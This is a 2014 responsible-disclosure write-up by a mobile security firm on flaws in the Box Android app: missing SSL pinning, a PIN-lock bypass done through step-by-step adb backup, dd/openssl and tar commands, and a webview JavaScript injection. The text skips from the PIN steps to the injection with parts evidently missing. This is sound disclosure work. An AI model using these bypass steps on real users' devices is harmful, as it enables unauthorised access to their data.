Box Android and iOS application Security vulnerabilities : Writeup

19.Nov.2014

We at Attify focus on mobile application security auditing and trainings. On weekends, we often spend time writing code for AppWatch – our flagship product, finding vulnerabilities and hacking hardwares. A few months back, we had a look at the Box Android and iOS apps and discovered a lot of security vulnerabilities in it.

**Note :***All the vulnerabilities have been disclosed to the Box security team, which were quite active in patching all the security issues. *

Let’s start with the Android application.

Vulnerability 1 : Traffic Interception (no SSL Pinning) and MITM

We decided to start the analysis with the network traffic interception and to verify whether Box uses proper implementation of SSL Pinning. Even though the box application uses SSL, it is possible to intercept the traffic using any proxy.

This is done by adding the proxy certificate into the trusted store of the Android device. Once this is done, the attacker can intercept username and password sent from the Box App.

Box App provides an additional security layer to its users by implementing pin lock on the client side for protecting its data. Pin lock is a 4-digit number in this case.

We can bypass this authentication method with the help of Android backup vulnerability.

It was quite straight forward to exploit this vulnerability and bypass the pin screen. This is also quite similar to the vulnerability discovered in Lastpass by Chris John Riley.

Setting up Pin Lock :

Go to Menu | Settings | Require Passcode | Set the pin

Configuring Box Pin

Setting up Pin in Box

Take the back up of Box app.

adb backup com.box.android -f box.ab

Backing up Box App data

Cover and copy .ab file : 24 bytes at a time and removing the first 24 bytes as they are a part of the .ab (Android backup file format) header. In case you’re interested, you could do a hexdump and see the 1st 24 bytes confirming that it’s a part of the android backup header.

dd if=box.ab bs=24 skip=1 | openssl zlib -d > box.tar

Prepare a list file of the tar archive which will be useful while repackaging the android backup file.

tar -tf box.tar > box.list

Extract the box.tar archive in order to modify the contents.

tar -xvf box.tar

The above command will extract the contents of box.tar. Traverse to apps folder.

Pin lock is stored in myPreference.xml which is located at – /apps/com.box.android/sp/myPreference.xml

The javascript was embedded in the response to the webview request made by OneCloudAddNewApp Activity, as shown below :

Finally, once the response is rendered, the javascript causes Box to delete its own contents. It could obviously be used for much more malicious purposes like getting a reverse shell by creating a payload using tools such as Drozer.

Another reason for webview vulnerability to be possible was the improper implementation of onReceivedSslError method.